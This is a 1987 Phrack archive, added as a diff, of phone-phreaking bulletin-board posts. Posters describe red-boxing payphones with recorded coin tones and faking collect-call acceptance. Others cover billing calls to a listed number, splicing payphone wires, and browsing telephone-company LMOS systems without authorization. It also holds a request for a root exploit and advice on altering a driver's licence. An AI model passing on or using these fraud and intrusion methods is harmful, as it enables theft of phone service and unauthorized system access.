+Date: 11:28 am  Sat May 23, 1987
+
+As many of you may know, Atlantis was down temporarily due to hardware problems
+but The Lineman just put the board back up so if you're on it, you can now
+continue calling.  If you're not, the number's in the B:BS List on the main
+menu.  Later
+-TK
+
+
+88/100: Back in Phrack!
+Name: Knight Lightning 2
+Date: 11:48 pm  Sat May 23, 1987
+
+Hi, I've been absent for a while because of a disassembly of computer and some
+other mishaps going on.  Anyway, things are still rolling along for SummerCon
+and the like so it should be a great event.  All pertinent details will be
+released in PWN 14 (if it ever gets released) so watch for it.
+
+:Knight Lightning
+
+
+89/100: I heard.....
+Name: The Disk Jockey 13
+Date: 1:05 am  Sun May 24, 1987
+
+...that Metallica's KILL 'EM ALL compact disc has a special encrypted coding,
+that when played on one of the new laser storage devices by Xebec, will print
+every payphone number in the metro Chicago area.
+
+Can anyone verify this?
+
+                                                 -The Disk Jockey
+
+
+
+90/100: Phrack
+Name: The Sensei 18
+Date: 7:19 am  Sun May 24, 1987
+
+   If Phrack just monthly?  Seems you see it one month (new version), then you
+don't for another 2 months.  Or is it one of those deals that "When it comes
+out, it comes out".
+
+Ts
+
+
+91/100: 2600 meeting
+Name: Mad Hatter 51
+Date: 10:59 am  Sun May 24, 1987
+
+Does anyone know any mroe info about the "2600 Public Get Together"?  I heard
+it is on Friday, June 5th.  Can anyone fill me in more?  I (unfortunately)
+don't subscribe to 2600, and I just heard that from a friend... Thanks..
+
+
+-Hatter
+
+
+92/100: 2600
+Name: Control C 8
+Date: 2:26 pm  Sun May 24, 1987
+
+The 2600 Public Get-Together8/l Friday, June 5, 1987 at 5pm
+
+It's at the Citicorp Center (atrium), 153 East 53rd St.  New York City.
+
+that's all I know about it..
+
+  Control
+
+
+93/100: intersting
+Name: The Leftist 71
+Date: 11:05 pm  Sun May 24, 1987
+
+did you know.. that you can tie off all the bridges in your c.o. to a  that
+filters off audio, and then, scream into the phone, and at the same time drop
+them 1 by one.. creates a neat little fade in effect..also, well never mind
+
+
+94/100: Get togethers
+Name: The Executioner 19
+Date: 9:46 pm  Tue May 26, 1987
+
+Well....Citicorp eh? hahaehaoheoaeh...
+
+"Excuse me, security, we have 100 screaming juveniles yelling something about
+ ESS and K-rad PABX'S D000DS!"
+
+"Ah, yeah,..."
+
+Anyway, let's all get together and see who REALLY goes to the beach in the
+summer eh? yes, ALBINO PHONE PHREAKS!!! WHY??? GET OUT OF THE GODDAMN HOUSE!
+
+anyway....RANT!!!
+
+Sexy
+
+
+
+95/100: hella
+Name: Lucifer 666 43
+Date: 11:46 pm  Tue May 26, 1987
+
+just got to Illinois.... anyways, Yea Disk Jockey, I did that Metallica thing
+and it did work, plus it gave a TRW root privs act at the end, but no
+dialup...
+
+L666
+
+where 2?
+
+
+
+96/100: well...
+Name: Sir Francis Drake 56
+Date: 11:17 pm  Wed May 27, 1987
+
+Blah.  Vaguely interesting article in NetworkWorld about toll fraud.  About
+a texas man who sold 15 codes to secret service agents for $3,000 (200 a
+piece!?) from TNT.  But the big excitmnt about it is that he was found guilty
+by a judge and will now go in front of a jury, making it the first time a
+toll fraud case when in front of a jury.  or something like that.
+
+Noble House crashed Stroke Of Midnight.  I knew you would care.
+
+In other news...Bill From RNOC reports that french kissing his dog is a bad
+idea.  And KL admits he is a mall rat.  More later.
+
+sfd
+
+
+
+97/100: Network world/Drake
+Name: Jester Sluggo 31
+Date: 1:24 pm  Fri May 29, 1987
+
+Drake, I read that also, and I'm gunna U/L it to Knight for his Phrack World
+News... (So others can read).
+
+ /
+ \
+ / luggo !!
+
+
+
+98/100: Well...
+Name: Sir Francis Drake 56
+Date: 1:42 pm  Fri May 29, 1987
+
+Oh damn, and I had wanted to type it in so I could my name in *PHRACK*!. ..
+
+                     EDITED, FULL JUSTIFIED, SPELL CHECKED,
+                       AND INCISIVE COMENTS BY
+
+                 K N I G H T  L I G H T I N I N G !
+
+(typedbysfd)
+
+-----
+
+Yes one of these days im going to stop being mean to KL, just you wait.
+
+sfd
+
+
+
+99/100: lovely
+Name: <<< The Executioner 19 >>>
+Date: 1:41 am  Sat May 30, 1987
+
+Lovely...
+
+I love people whose names take up more line space than their message....
+
+Boy, wish I was just a rad kinda neat-o peachy -keen type thrasher squid.
+
+
+
+
+
+100/100: 15 Code Culprit
+Name: The Sensei 18
+Date: 6:07 pm  Mon Jun 01, 1987
+
+
+  Yeah, upload the file...article.  I wouldn't mind reading all the details.
+Maybe sticking it up on TSR.
+
+Ts
+
+
+Post on Phrack Inc./Gossip? No
+
+
+                                      ^*^
+=========================================================================
diff --git a/phrack20/7.txt b/phrack20/7.txt
new file mode 100644
index 0000000..f48266c
--- /dev/null
+++ b/phrack20/7.txt
@@ -0,0 +1,1341 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 20, File 7 of 12
+
+
+                    Metal Shop Private's -- Phreak/Hack Sub
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This subboard contained all technical questions and conversations about
+phreaking and hacking.  If something was illegal on it (occasionally some idiot
+would post codes and then soon after be deleted), it was removed as soon as I
+saw it.
+
+
+1/70: Red Box......
+Name: The Disk Jockey 13
+Date: 4:24 am  Sun Apr 26, 1987
+
+Back at the private school I went to, everyone lived pretty much out of state,
+and would always be calling their girlfriends back at home, thus making a
+pretty big investment into the local payphones.  After reading the files on
+how a red box worked, took my little dictation recorder and went to a payphone
+and found that I could record the tones that were made when you dropped
+quarters in.  I recorded about $4 worth of quarters, and it worked great.
+Every time the computerized voice would say "Please deposit $1.70 for the past
+5 minutes" you could just play the tape via a pair of sony walkman headphones
+into the mouthpiece, and the phone would think that you deposited money in it.
+It was pretty neat back then (several years ago.....) but every now and then
+you would get the regular operator on instead of that synthasized voice.
+
+
+                                            -The Disk Jockey
+
+Yes, not really important, but I saw "red box" in that last message and it
+reminded me of that.  Those were the days when there were lots of extenders
+with 3 and 4 digit codes, and PBX's with NO codes.....
+
+
+
+2/70: Since
+Name: The Leftist 71
+Date: 5:26 am  Mon Apr 27, 1987
+
+Since non-sup seems to be popular these days
+404-289-0000-0009 test recordings, non-supd.. I beleive 0004 is deposit coin..
+anyway, these are fun to forward to when you dont want people to be able to
+reach you..
+Ltist
+
+
+
+
+3/70: Teleco numbers
+Name: Mad Hatter 51
+Date: 5:36 pm  Mon Apr 27, 1987
+
+Would most(all) of the Teleco numbers(i.e. 99xx series) be non-suped?  That
+would seem at semi-logical atleast, eh?
+
+-Hatter
+
+
+
+
+4/70: Tuning Fork
+Name: Knight Lightning 2
+Date: 7:34 pm  Mon Apr 27, 1987
+
+How succesful would you be if you tried to use a tuning fork to simulate 2600
+Hertz?  And if so, what would be good to use for MF?  Fun, no?  Heh!
+
+Also, what does anyone know about the 508 NPA.
+
+:Knight Lightning
+
+
+5/70: Supvision Xlation
+Name: Doom Prophet 21
+Date: 10:13 pm  Mon Apr 27, 1987
+
+The best way to box is to pull a cat's tail after making a call, then get a
+rubber band and twang it in your teeth like Snoopy for MF.
+
+Since we were talking about supervision a little bit, I went through some
+stuff I had on translations. What I think makes a number unsupervised  (besies
+the fact that there is no return of supervision, or reverse battery
+signalling) is the charging translation in the terminating office. The
+screening code of a chart class (charges and route are determined by the chart
+class I believe) that denotes the call charge type would register to not make
+either a detailed or bulk AMA entry at the toll office (if the number is 1+
+for someone), since it as if the number never answered. A 'detailed' AMA entry
+shows the calling and called numbers, whereas a bulk AMA entry shows only the
+calling number.
+
+Something else about translations, it doesn't mean an 800 to POTS or special
+BTN when people talk about ESS translations, but the information on particular
+Directory Numbers that finds and identifies the line equipment of the called
+number (calling also I believe) that would provide any special info that is
+needed by the switch to process the call, for example, whether a call is
+coming from one or two party lines, or whether it is a four party line with
+full selective ringing (which can't be tested by MLT equipment which is why I
+remember it). If no translation influenced the way the call is processed, then
+how would the switch know to route tthe calling party to an operator for ONI
+if the calling line was more than two party (with the specifications talkd
+about earlier about the R and T leads status determining the billing also
+taken into consideration).
+
+Anyway, this post is basically correct but if anyone finds any errors then
+please correct me.
+
+Doom
+
+
+
+6/70: Things
+Name: Phantom Phreaker 46
+Date: 10:41 pm  Mon Apr 27, 1987
+
+  Well, RC's on an ESS are called translations too, at least when done by an
+RC-MAC clerk. RC data involving a line that is changed can be called
+translations. Don't ask me why this is so, but it's what I've heard.
+
+  Does anyone here know what an ANIF-7 is? As far as I can tell, it is an ANI
+failure to TSPS, but that's all I know about it...it can probably happen
+anytime, but I do know that it was a specific problem with an early 5ESS
+generic.
+
+  Oh yeah, another unsuped signusoid is at (618)235+0090..this was found by
+Syntax Error a long time ago. A neat thing about these 'tone sweeps' is that
+if you call through an OCC that uses an OUTWATS line that is set up on an
+inband signalling trunk, the OUTWATS linne will be trunked from the other end.
+This happens as the tone gets near 2600Hz, but it is more sensitive on an OCC
+switch, as something like 2710 and 2500 will also reset or trunk their
+equipment, or at least that's what I've found.
+
+Phantom
+
+
+
+7/70: FALFALAFL
+Name: Taran King 1
+Date: 11:01 pm  Mon Apr 27, 1987
+
+I'd like to congradulate Doom Prophet on his extremely witty response to KL's
+absolutely out-of-place post.  REFRAIN
+
+Question...Most test numbers are unsuped, but I have at least one tone sweep
+that I can think of off-hand that is suped.  What would be the purpose either
+way?  Later
+-TK
+
+
+
+
+8/70: repair number
+Name: The Scanner 20
+Date: 2:34 pm  Tue Apr 28, 1987
+
+ Would the repair number used for a payphone be the same as a residence repair
+number?  Also, Doesnt the place that houses the phone (say a gas station) don't
+they get a cut of the profits from the phone?  If they do,
+wouldnt they have the repair number?
+
+                    _-The Scanner
+
+
+
+
+9/70: 2 Q's
+Name: Circuit Breaker 5
+Date: 12:11 pm  Wed Apr 29, 1987
+
+Why are there PBXs that give a loud tone before the code.  And does anyone
+know what the difference is between the ANI-D jack and regular ANI is?
+
+
+
+
+10/70: Red-boxing
+Name: Icarus 15
+Date: 11:32 am  Thu Apr 30, 1987
+
+I saw before that someone mentioned that the amount of money entered into a
+payphone of some kind is not kept track of.  If this is true then it would
+seem impossible for MA DUMBELL to ever catch on to red-boxing.  That is if
+AT&T phones don't have a money counter in them.  TK-When the money was
+collected from the payphone, did you notice whether he had the amount of money
+that was "supposed" to be in there?  Or whether he even checked it?
+
+If the money is counted then it is possible that the person who collects the
+coins would get in trouble for not reporting all the money that was
+registered.  The money not being there because of redboxing.
+
+It is also possible to red box off of blue AT&T payphones (without a money
+slot).  I am curious whether that can EVER be found out, since there is no
+money counter (obviously) to check.
+
+Icarus
+
+
+
+
+11/70: Well...
+Name: Taran King 1
+Date: 2:41 pm  Thu Apr 30, 1987
+
+Next time I see the guy there, I'll ask him, but I did see him write a few
+things down.  None that I could decipher meant anything related to money so
+I'm not sure if there was a counter in it.  I'll have to check it out though
+-TK
+
+
+
+
+12/70: Payfone Mutin
+Name: Jester Sluggo 31
+Date: 6:49 pm  Thu Apr 30, 1987
+
+That was supposed to be "Payfone Muting".
+
+    In anycase, on most new payfones, they have what is called "Muting"
+which "mutes"-out any red box tones from entering through the Mouthpiece.
+Those new non-coin-slot payfones should have those, but I've never tried.
+
+ /
+ \
+ / luggo !!
+
+
+
+
+13/70: DNR/Pen Registers
+Name: Knight Lightning 2
+Date: 7:04 pm  Thu Apr 30, 1987
+
+Are there any noticable effects from having one of these on your line? Static,
+a low hum in the background, or line noise where there shouldn't be?
+
+:Knight Lightning
+
+
+
+
+14/70: well...
+Name: Lucifer 666 43
+Date: 7:40 pm  Thu Apr 30, 1987
+
+about the tuning fork...it does work.. i've used a harmonica..
+
+also, how exactly do the bandwiths switch in multiplexing...
+
+L666
+
+
+
+
+15/70: From what I've heard
+Name: The Scanner 20
+Date: 8:30 am  Fri May 01, 1987
+
+ That there isnt any way to detect a Pen register. No humm, buzz, or any thing
+else. But hey, what do I know?
+  Dont answer that.
+
+Anyway, 2 more questions,
+
+  Im sure momma bell knows all about red box tones and stuff like that. But,
+what about those independent co's that make pay telephones and just kinda hook
+them up to normal lines in stores and stuff.  Wouldnt they be easy to box off
+of or do they work in a different way altogether? Well, that was only one but
+an answer is appreciated.
+                        _-The Scanner
+
+
+
+16/70: 'Round here...
+Name: Taran King 1
+Date: 2:41 pm  Fri May 01, 1987
+
+In this region, you can't just play the tones into the mouthpiece and get cred
+(credit) for whatever you've played into the phone...you CAN, though, dial a
+long distance number, it will then say, "Please deposit $x.xx".  You put in
+(play the tones for) the money and it says something like, "Thank you for
+using AT&T."  Ta da
+-TK
+
+
+
+
+17/70: Muxing, Etc
+Name: Doom Prophet 21
+Date: 4:56 pm  Fri May 01, 1987
+
+Lucifer, I think what you mean about the bandwidths changing in Multiplexing,
+you are referring to voice frequency bandwidths. Multiplexing is just a method
+of sending more than one converstation down the same transmission path. In
+analog and older switches the method is called Frequency Division
+Multiplexing, or FDM, when the signals are seperated on basis of frequency, as
+opposed to newer switches which do it on a Time division basis (TDM). There's
+also something called Space DM but I don't think it has a whole lot to do with
+telephones (maybe stuff like digital Xmission). But anyway, a normal VF voice
+bandwidth goes from 300 to 3000 Hz which is SF in band, although the VF
+channel goes from 0 to 4000 Hz. Anything above 3000 is out of band signalling
+(like 3700 Hz). CCIS uses a seperate nettwork composed of STP's and varioius
+links and channels for independent signalling methods.
+
+About the red boxing, the circuits that keep track of the coins that have been
+entered are called Coin Detection & Announcement circuits (if the fortress is
+in an ACTS serving area), which are a part of the Station Signalling
+Announcement Subsystem which work out of local offices and in conjunction with
+TSPS (not TOPS as far as I have seenn,  a flash of the switchook anytime
+during the initial charge announcements and an operator is connected. Playing
+the tones to a live operator wouldn't be a good idea as they can obviously
+tell the difference.
+
+Something else, there was a little discussion about AMA and all (isn't there
+everywhere?) a while back. The way a local office (LAMA) would keep track of
+the billing data is to use a few AMA circuits (there are always two, AMA0 and
+AMA1 but can be more for big offices) that reverse positions (from an active
+to standby mode at midnight when the datta in the buffer is recorded onto the
+actual tapes). So the AMARC computers can format the data to where it is
+recognnized by the RAO, the tapes have to be specially customized for that
+particular officere. A header label on the tape (put on at the beginning of
+each new tape entry (12)) tells the originating NPA, the office number, date
+and tape transport dates. A tape trailer is added on at the end of the tape
+entry for that day, which has the info about how many total calls were AMA
+recorded. The tape mark is some digit (?) that tells the RAO that the useful
+info (that they need to look at) is ended. The billing data itself is in a
+binary coded decimal form (0's and 1's) along with check and dummy codes. A
+noncheck dummy code fills the spaces on the tape to signigy that there wasn't
+a problem, but the space is supposed tobe there. A check dummy code is because
+the info wasn't received or sent from the Peripheral Adress bus or from the
+originating register into the charge buffer. If you ever come across AMA
+records (like in the call store section of SCCS) it won't look like anything
+that can determine billing (AMARC and RAO do that). They aren't too hard to
+read though, just takes a while.
+
+Doom
+
+
+
+Read:(1-70,^17),T,R,Q,P,A,? :
+
+
+18/70: Correction
+Name: Doom Prophet 21
+Date: 5:52 pm  Fri May 01, 1987
+
+Damn, what I got that I thought was some type of AMA records are not AMA
+records (I think), so that means that I haven't been reading AMA records.
+Shit, that's something that I want to do. Have to get some.
+
+Doom
+
+
+
+19/70: well...
+Name: Sir Francis Drake 56
+Date: 8:15 pm  Fri May 01, 1987
+
+You mentioned the third time of multiplexing as Stad DM or something, I
+believe  what you mean is Stattistcal Time Division (STDM).  A STDM is just
+a normal TDM improved so that empty bandwiths (which occur on TDM) are used
+by busy ones.  This allows a hell of alot more efficient use of the line then
+TDM's.  STDM is mainly used when you have alot of terminals/whatever that
+wont always be being used.
+
+Hmm, I have some good stuff on pay phone accounting somewhere....
+
+sfd
+
+
+
+
+20/70: Payf0nez
+Name: Phantom Phreaker 46
+Date: 10:57 pm  Sat May 02, 1987
+
+  There are some types of payphones that are attached to a normal cable pair,
+a normal line, and in this case the payphone like usage would be determined in
+the phone and not in an office. I can't remember the exact type, or even where
+I read it but if I should find it by any chance then I'll put it p.
+
+Phantom
+
+
+
+
+
+21/70: P-Phones
+Name: Jester Sluggo 31
+Date: 12:19 pm  Sun May 03, 1987
+
+Well, there are several manufacturers of payfones that make several different
+type of payfones.  If someone could call up the factory, or a salesman, or
+dealer of these products, and pose as a perspective buyer, then that'd solve
+these questions..   (shit..)
+It perhaps might make a good file for Phrack.   But I don't have the time do
+to do those things.)
+
+ /
+ \
+ / luggo !!
+
+
+
+
+22/70: AMA
+Name: Circuit Breaker 5
+Date: 10:43 pm  Sun May 03, 1987
+
+There is some AMA info on LMOS.  The audit file is under /dev/smlog /smlog.
+
+I got a list for two different streams ST1 and ST2.  You should see,
+office id
+days until expiration
+process start time
+        stop time
+the ama default
+ama teleprocessing
+its also will have some stuff such as HOC password and a backup HOC password,
+Also look under /dev/unixabf /unixa/users, this will give you the termination
+codes after the stream code like:
+S# (#)=termination code + date + time
+
+  Circuit Breaker
+
+
+
+
+23/70: audit file
+Name: Circuit Breaker 5
+Date: 10:49 pm  Sun May 03, 1987
+
+One more thing to check on the audit file dump /no5text/rcv/aimrc.
+I would think the audit file is like audit on a VAX it just checks your access
+level if your insuficient you can't read that file.
+
+
+
+
+24/70: Circuit Breaker
+Name: Phantom Phreaker 46
+Date: 1:11 am  Mon May 04, 1987
+
+ (Trying hard to leave an intelligble post)
+
+ Circuit Breaker, what LMOS system do you have access to? Do you (it looks
+like it to me) have access to only the unix Front End system, or do you have
+the IBM VM370 host processor? Anyway, not all front ends are the same, try
+accessing the Cross Front End (XFE) via the Network Manager program
+(/usr/lbin, I think) nmx or the NMstatus program and checking for those
+specific files you posted about. I'll have to check the LMOS I have access to
+and see if those particular files you posted about exist. You also might want
+to look at the CRSAB RSA's help files for asyncronous terminal connections in
+the help directories. You are probably already good at unix, but try this to
+locate those help dirs:
+
+$ cd /
+$ du *>/dev/du.txt&
+
+ Then in a few minutes, do
+
+$ cd /dev
+$ cat du.txt
+
+
+ That will give you a listing of all the directories on that system, and if
+you see any that resemble help files then go there and cat everything...
+
+Phantom
+
+
+
+25/70: Payphones (again)
+Name: Icarus 15
+Date: 3:08 am  Mon May 04, 1987
+
+If the wires are exposed leading up to the payphone, and you hooked up handset
+to the appropriate wires, can you make direct calls?  If the case is that you
+can, there are many phones I know of that do not have the metal encasing
+around the wires.  I have to try it.  I am pretty sure that bypassing the
+simple hardware of the payphone console itself does not grant open access to
+all outside lines.  Or does it?
+
+
+
+26/70: LMOS/Unix
+Name: Evil Jay 26
+Date: 4:18 am  Mon May 04, 1987
+
+    Could someone print out some commands to do on LMOS? What exactly can
+be done on the system. Please explain. Also, how do you turn off the log
+when logging into a Unix, and if possible, could someone leave me a C prg
+to give my account root priveledges. Terminus was playing around, and
+letting me check out one of these prgs but I never got a chance to save/copy
+it. Thanks/...
+
+-Jay
+
+
+
+
+27/70: Payphone Wires.....
+Name: The Disk Jockey 13
+Date: 7:33 am  Mon May 04, 1987
+
+At the school in Indiana that I went to, there were tunnels that connected
+every building in the school together and dated back to the early 1900's, so
+we would get drunk and cruise down there and check out old crap that you find
+laying around in the basements that some of these tunnels went to.
+
+ANYWAYS,  in one of these tunnels there was a HUGE phone block with hundreds
+of cable pair.  I brought the dandy test-set one night and started trying
+different connectors to get a dialtone.  When I did get a dialtone, I tried to
+dial a local number, only to get a "please deposit 20 cents" recording, so my
+guess from that experiance would be that the phone doesn't make much of a
+difference, and that you would NOT be able to dial direct calls on it.
+
+I have a driver's license that says I'm like 24, and I look it, so I too can
+buy for any who need it.  Michigan licenses are the easiest to change, just as
+(ask) any Michigan person who was born in 1967.
+
+
+                                                 -The Disk Jockey
+
+
+
+
+
+28/70: Fortresses/LMOS commands
+Name: Phantom Phreaker 46
+Date: 7:22 pm  Mon May 04, 1987
+
+  Come to think of it, it is the actual line and not the phone in most cases,
+take a look at the Class of Service or Universal Service Order Code in an ISVH
+(ISH) or an INQ from COSMOS or get it via an Basic Output Report (BOR). Now,
+if you really wanted to go out of your way to 'fix' a payphone to where you
+could dial out normally, you might be able to accomplish this via RC-MAC, or
+maybe an SCC. But if you did do this it would almost certainly die when the
+bill came.
+
+Phantom
+
+PS-I will post up pertinent data from an ISH upon various payphones next time
+I log on, if anyone would like to see it.
+
+
+
+
+
+29/70: Payphone ISH
+Name: Phantom Phreaker 46
+Date: 7:43 pm  Mon May 04, 1987
+
+  Ok, I ISHed a few payphones and here's the results:
+
+  The STatus was (of course) WK (Working), the TYPE was C (Coin), the Class of
+Service (CS) is CN (CoiN), the Universal Service Order Code (US) is 1PC, which
+means single party something.. can't remember. The Line Class Code (LCC) field
+contained CDF, I don't know what  CDF means though.
+
+  On older post-pay telephones (the kind where it either gives you a loud
+annoying 'buzz' when the calling party answers, or the kind that allows you to
+hear them but them not hear you until you put your coins in) probably have a
+US of 1PP (Single party, Post Pay), and Coin First phones (the kind that you
+must put money in to get a dialtone) have a US of 1CF (Single party, Coin
+First).
+
+Hope that helped,
+Phantom
+
+
+
+30/70: Question
+Name: Cap'N Crax 10
+Date: 3:43 am  Tue May 05, 1987
+
+Does anyone know why, and how, it
+is allowable to place collect calls
+to loop lines.  I know that this
+does work, as I have done it.  I
+was wondering how it (loop) is
+classified, why it passes the billing
+verify, and to whom is the billing
+allocated?  It is obviously recorded
+on AMA, and it apparently pissed
+off Bell.  No more loop...
+
+C^2
+
+
+
+
+
+31/70: --------
+Name: Circuit Breaker 5
+Date: 10:25 pm  Tue May 05, 1987
+
+Phantom what do you mean 'trying for an inteligible post'?  I was telling Doom
+how to get some AMA data from LMOS.  I am sure the LMOS you have access to has
+an AMA audit file, its just a security feature.
+
+
+
+
+32/70: Call Blocking....
+Name: The Mad Hacker 47
+Date: 7:06 pm  Wed May 06, 1987
+
+What Is Call Blocking? It has something to do with a condition in ANI/ONI. I
+read it in My Cama Manual and It was vague. Any Help?
+
+          -TMH
+
+
+
+
+33/70: A few LMOS commands
+Name: Control C 8
+Date: 8:46 pm  Wed May 06, 1987
+
+Here's some /FOR commands
+
+TV - Trouble Verification
+RJR and DMLR are jepordary reports..
+
+Shit I had some more, but I can't rember..
+
+Control
+
+
+
+
+34/70: datakits...
+Name: Slave Driver 58
+Date: 11:56 am  Thu May 07, 1987
+
+
+  Does anyone have any experience
+hacking datakits?
+
+NODE dkeasta   blah blah
+
+NETWORK ACCESS PASSWORD:
+
+  any ideas on the password?  Anyone have -any- idea of the format, length etc?
+
+any help appreciated..
+
+Steve Driver
+
+ps.  I know what they do, I just need to get on famous last words|
+
+
+
+
+
+35/70: More LMOS
+Name: Doom Prophet 21
+Date: 8:28 pm  Thu May 07, 1987
+
+Ok, I hadn't seen that in LMOS yet, CB, thanks for the info. There are other
+ways to access the info in an intermediate call store section/buffer of sorts
+from SCCS, and of course the AMARC systems. On another board, Phantom asked
+what AMASE was, I would think that it could be an abbreviated form of 'AMA
+Sensor', you know, BDT's,  CDA's, and ESS software format sensors, or special
+VSS sensors maybe.
+
+On LMOS..some of the things are common knowledge (in BSTJ's and all) but I
+will post a few and what they do.
+
+Let's see, to screen status troubles, ttry /FOR MSCR. You may have to know
+employee codes of the screener and the MC code, it's been a while since I've
+been on.
+                                                                        
+The different actions in the Mechanized Screener transactions are run an MLT
+test, get job and work info, run RST transaction, read mail, clear the mask
+(indicating no action), review desk items, return to original status, put item
+on the Local Test Desk (used to test lines that the MLT/LTS equipment can't
+for some reason, such as selective ringing multiparty lines), put screener in
+the off duty status (returning work items into the pool I believe). Others are
+/Te (Trouble Entry), DISP, etc.
+
+Something somewhat interesting,  in the /tmp direcoty for an FE, look at the
+Console/log0 file, which contains countters and info on how many certain
+transactions have been done for a certain time period (RBOR is in there but
+I'm not sure about the rest). Other commands do things like add changes to
+LMOS tables, look at work summaries, check all jobs related to a certain CTTN
+(cable trouble ticket number) or TTN, and review all work items for specific
+FE's. If anyone wants anything specific about some of these commands leave ma
+(me) a letter or post since it seems  the discussion is going good. I'm sure
+Marauder or others could proably correct me on a few points, but oh well.
+
+Doom
+
+
+
+36/70: Call Blocking/Loops/etc.
+Name: Phantom Phreaker 46
+Date: 11:09 pm  Thu May 07, 1987
+
+    Circuit Breaker, what I meant was that I was fucked up, and having a hard
+time typing legibly. That's all.
+
+    Call blocking is a vague term, can you tell us what it relates to, CAMA,
+ANI, PBX's, or what? A basic description is that it is what happens when the
+network is operating at peak, and all trunks are busy, and thus the caller
+gets a re-order or is left sitting there.
+
+ Be more specific if you can, because there is also a thing called 'blocking'
+on PBX's which is similar but on a smaller scale.
+
+  To whoever asked about the collect call to the loop, well loop-around
+numbers are probably either an Official or a Test line, at least the ones I
+have seen. So unless they set some type of screening to it so it can't accept
+collect calls then you could collect call a loop, but hope that you didn't
+dial direct from your home because your number would be on their phone bill.
+
+ Control C, since you seem to have a manual or something on ESS, could you
+tell me what a RC15 report is, I am very confused about them. Thanks...
+
+Phantom
+
+
+
+37/70: Coin Tests...
+Name: The Mad Hacker 47
+Date: 12:07 am  Fri May 08, 1987
+
+SFD posted in the previous sub abour coin tests. I ask you this. The CO, upon
+completion of a call, removes -48 volts from the ring, ground from the tip and
+either a -130 volts(Refund) or +130 Volts(Collect) is applied to the tip to
+operate the cion relay in the phone. If Someone were to have acces to the
+exposed wires outside of the phone, wouldn't they be able to simulate the
+voltage necessary to refund their own money(Theoretically speaking if they
+could simulate the voltage in a Phone Booth of course)? Would that Be
+Possible? I also broke out my testboard, Station, and network Manuals and
+Found that their is some significance in turning the handset of the payphone
+upside down. I can't find out exactly why yet, but it is all over the "Coin
+Maintenance Check Booklet" that bell uses as reference for Coin Stations. I
+will search more through the book and see what I can find.
+
+                              The Mad Hacker
+
+
+38/70: Collect call
+Name: Icarus 15
+Date: 12:52 am  Fri May 08, 1987
+
+If you hack a mailphone system of some kind that only requires the number to
+be called and the initia message will be played, then you can have the message
+say, "Hello?........Sure. hangup|" This will enable you to make a third party
+billing call to anyone and use the mailphone system as the party paying for
+the call.  The operator will cal up the mailphone, the msg will play and
+she'll hear the person being billed say, "Sure." when asked if they accept the
+charge.
+
+In any case if you want to make a call bill it to 312-410-7132, and it will go
+straight through.
+
+Icarus
+
+
+
+39/70: Call blocking
+Name: Lotus 38
+Date: 3:44 am  Fri May 08, 1987
+
+I know that in parts of Florida that a new system uses the term "call
+blocking" simply to stop someone in your co's area from calling you.  You would
+do something like "*80+number to block" and when that number calls you , a
+"You can not dial XXX-XXXX at this time. Try again later"
+
+Other features include immediate call back.  This allows you to hit a few
+keys on the phone and call back whomever just called you (again, only if
+they are in your local co).
+
+Anyone else have info on this?
+
+
+
+40/70: Collect Calls.....
+Name: The Disk Jockey 13
+Date: 6:55 am  Fri May 08, 1987
+
+A few years ago, in school (out of state) everyone had their ways  making free
+calls, someone had a number to a recording, something like that VMS, and it
+said "This number accepts all collect and 3rd party billing calls" and it
+worked all the time.
+
+Another way is to make a collect call to an out-of-state extender.  Let me say
+it this way....
+
+I'm calling from 219 (Indiana) and I call the local MCI node in Chicago
+collect.  The operator asks "your name" and you say in a fem voice
+"Brenda"....the call will go through, and you will here the usual MCI tone.
+RIGHT AWAY, you press a number on t touch tone pad, this will silent the MCI
+tone.  Then you say in your own voice "Hello?"  for all the operator knows,
+you are the one that answered!  The only problem is that you have to work
+fast, else you get a re-order in about 15 seconds.
+
+                                            -The Disk Jockey
+
+
+
+
+
+41/70: Call Blocking...
+Name: The Mad Hacker 47
+Date: 9:19 am  Fri May 08, 1987
+
+I will get more specific on the Call Blocking I am refering to. It isn't what
+Lotus suggested. That Sounds more like DMS-100 Options(Sounds Exactly like
+them, in fact). I thought that the FCC wouldn't allow AT&T to use those
+options, though. Maybe I was mistaken. I think that the call blocking I was
+refering to is more towards the overload on any paticular circuit as was
+mentioned before.
+
+                 The Mad Hacker
+
+
+
+
+42/70: toll phone
+Name: Circuit Breaker 5
+Date: 10:46 pm  Fri May 08, 1987
+
+In most areas in Europe, the wire to payphones hang out below the phone if you
+splice those wires to you handset, you can dial direct without any imitation
+tones.
+
+
+
+
+43/70: Call Blocking
+Name: Phantom Phreaker 46
+Date: 2:23 am  Sat May 09, 1987
+
+ Call Blocking is indeed a feature of (C)LASS....but that CLASS feature is
+LATA based around LCCIS, not upon a CO and intraoffice calls. For more info
+read any CLASS file, or check out LOD/H TJ 1, file 1, CLASS, by Videosmith.
+It explains it pretty clearly. There was a PBX test number in 305 (the testing
+grounds of CLASS) that I had gotten somewhere that had a demo of CLASS
+features on it, such as Call trace, selective call forwarding, call blocking,
+etc. It was called Touch-Star, I think, or maybe Touch-Tel, one of the two.
+Anyway, LASS is used in the 717 (Harrisburg, PA) NPA.
+
+Phantom
+
+
+
+44/70: Addition.
+Name: Phantom Phreaker 46
+Date: 2:32 am  Sat May 09, 1987
+
+ (I forgot something)
+
+ DMS-100 does have something like it's own call blocking. It can be used to
+restrict certain types of lines from calling other types. The destination
+switch checks the information sent in from the (intraoffice) DN, (I think the
+Screening Code, probably) or from an INC (incoming trunk). This can be done to
+restrict access to official lines and such.
+
+Phantom
+
+
+
+
+
+45/70: i thought
+Name: Lucifer 666 43
+Date: 2:26 am  Sun May 10, 1987
+
+none of the DMS features blocking other people from calling you, etc| were
+not implemented.... I thought that the user-choice stuff was never put in...
+
+was I wrong?
+
+L666
+
+
+
+
+46/70: RC15?
+Name: Control C 8
+Date: 11:17 am  Sun May 10, 1987
+
+Phantom,
+
+    Are you sure the RC15 exists?  RC's start at 16 and end at 29..
+Maby I'm just screwed...
+
+
+
+47/70: FACS
+Name: Mad Hatter 51
+Date: 5:57 pm  Tue May 12, 1987
+
+Can anyone fill me in on FACS?  I got the file by Sharp Razor and Doom Prophet
+has told me about it somewhat, but can anyone explain detailed info on it?
+Thanks (d00d)...
+
+-Hatter
+.s
+
+
+
+
+48/70: TC15
+Name: Phantom Phreaker 46
+Date: 7:21 pm  Tue May 12, 1987
+
+ Actually, it's a TC15 report on a 1AESS... not RC15. Sorry about that. A TC15
+is very long and has a few acronyms in it that I don't recognize. About the
+only one I can remember right now was PUC, Peripheral Unit Controller.
+
